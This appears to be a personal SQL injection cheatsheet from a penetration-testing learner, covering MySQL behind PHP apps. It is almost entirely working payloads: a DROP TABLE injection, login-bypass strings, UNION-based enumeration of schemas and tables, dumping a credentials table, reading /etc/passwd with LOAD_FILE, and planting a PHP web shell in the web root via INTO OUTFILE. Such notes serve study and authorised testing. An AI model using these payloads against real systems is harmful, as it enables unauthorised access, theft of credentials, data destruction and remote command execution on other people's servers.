These cheatsheets serve as my personal quick reference. Therefore, they’re less organized than the box walkthroughs, but I’ve shared them in case others find them useful.
SQL injection cheatsheet
Example of vulnerable PHP code
User input is directly passed in the SQL query.
$conn = new mysqli("localhost", "root", "password", "users");
$searchInput = $_POST['findUser'];
$query = "select * from logins where username like '%$searchInput'";
$result = $conn->query($query);
Example with regular user input:
select * from logins where username like '%admin'
Exploited by closing the ' ', need to enter a ';
'%1'; DROP TABLE users;'
Then, the query becomes:
select * from logins where username like '%1'; DROP TABLE users; -- ' (need to get rid of second ')
Authentication bypass
Example of query being used for authentication:
SELECT * FROM logins WHERE username='admin' AND password = 'admin';
Verify whether application is vulnerable
Insert one of the following payloads in one of the fields:
' " # ; )
Tip: Try URL-encoded as well
Auth bypass with KNOWN username
METHOD: OR Injection
The query will be something like this:
SELECT * FROM logins WHERE username=''' AND password = 'something'; --> Syntax error --> probably seen in site response
Bypassing of the authentication can be done with OR injection:
admin' OR '1'='1
Query becomes:
SELECT * FROM logins WHERE username='admin' OR '1'='1' AND password='something';
The AND has priority of the OR.Therefore, the statement can be grouped as such:
WHERE username='admin' OR ( '1'='1' AND password='something' )
Evaluation results in:
WHERE username='admin' OR ( TRUE AND FALSE )
Further evaluation:
WHERE username='admin' OR (FALSE )
Further evaluation:
WHERE TRUE OR (FALSE) --> TRUE auth bypass
Note that this works only when the username is known
METHOD: COMMENT Injection
Payload:
admin' -- - something
The query will be:
SELECT * FROM logins WHERE username='admin'-- ' AND password = 'something';
Note that this works only when the username is known
Auth bypass with UNKNOWN username
METHOD: OR Injection
For this, we need both fields to always return true. Then, the user present in the first row will be logged in.
payload:
' OR '1'='1 (username field) ' OR '1'='1 (password field)
Now, we get the following query:
SELECT * FROM logins WHERE username='' OR '1'='1' AND password='' OR '1'='1';
This is evaluated as follows:
WHERE username='' OR ('1'='1' AND password='') OR '1'='1'
WHERE FALSE OR (TRUE AND FALSE) OR TRUE
WHERE FALSE OR FALSE OR TRUE
TRUE
Query is always true. Therefore, the first row is returned and that user is now logged in.
Union Injection
Detect number of columns
Order by method:
' order by 1-- -
Keep increasing until receive an error --> you know the amount of columns.
UNION method:
' UNION select 1,2,3-- -
Keep changing the numbers until it works.
Location of Injection
Often, not all columns are displayed on a web page. Therefore, we need to make sure our injection takes place in a column that is visible on the webpage. Otherwise, we will not see it's outputs.
' UNION select 1,@@version,3,4-- - (testing what columns are displayed)
Database Enumeration
Identifying MYSQL
To identify whether it is MYSQL, use one of the following queries:
| Query | Scenario | Output in MySQL/MariaDB | Behavior in Other DBMS |
|---|---|---|---|
SELECT @@version |
When we have full query output | MySQL Version (e.g., 10.3.22-MariaDB-1ubuntu1) |
In MSSQL it returns MSSQL version. Error with other DBMS. |
SELECT POW(1,1) |
When we only have numeric output | 1 |
Error with other DBMS |
SELECT SLEEP(5) |
Blind/No Output | Delays page response for 5 seconds and returns 0 |
Will not delay response with other DBMS |
Getting data from INFORMATION_SCHEMA Database
This database gets us information about the which databases are present as well as their tables and columns.
To find all databases:
SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;
UNION injection example:
UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -
Find current selected database:
SELECT database(); ' UNION select 1,database(),2,3-- -
Find table_names and their respected database (table_schema):
' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- - note that the where can be omitted
DUMP columns out table:
' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -
DUMP the data:
' UNION select 1, username, password, 4 from dev.credentials-- -
Reading Files
Need FILE privilege
Check current user:
SELECT USER() SELECT CURRENT_USER() SELECT user from mysql.user ' UNION SELECT 1, user(), 3, 4-- - ' UNION SELECT 1, user, 3, 4 from mysql.user--
Check user privileges:
SELECT super_priv FROM mysql.user ' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- - (can add where="current_user" when lot's of users)
Returns Y or N
Check other privileges:
' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- - (can add where grantee="'current_user@localhost'" when lot's of users)
Read files:
SELECT LOAD_FILE('/etc/passwd');
' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
Writing Files
Need FILE privilege, secure_file_priv and write access at location backend server
Check secure_file_priv global variable:
SHOW VARIABLES LIKE 'secure_file_priv'; (not via union) SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv" ' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- - (union)
If variable is empty --> read/write to entire file system. If variable has a directory --> only read write to that directory. If variable == null --> can't read/write
We can write files using the following syntax:
SELECT * from users INTO OUTFILE '/tmp/credentials'; SELECT 'this is a test' INTO OUTFILE '/tmp/test.txt'; (use to write reverse shell) ' union select 1,'file written successfully!',3,4 into outfile '/var/www/html/proof.txt'-- -
Note that /var/www/html is the web root for apache servers
Writing Files: Web Shell
' union select "",'<?php system($_REQUEST["cmd"]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
Surf to the webroot with ?cmd=command in the url as a parameter to execute commands.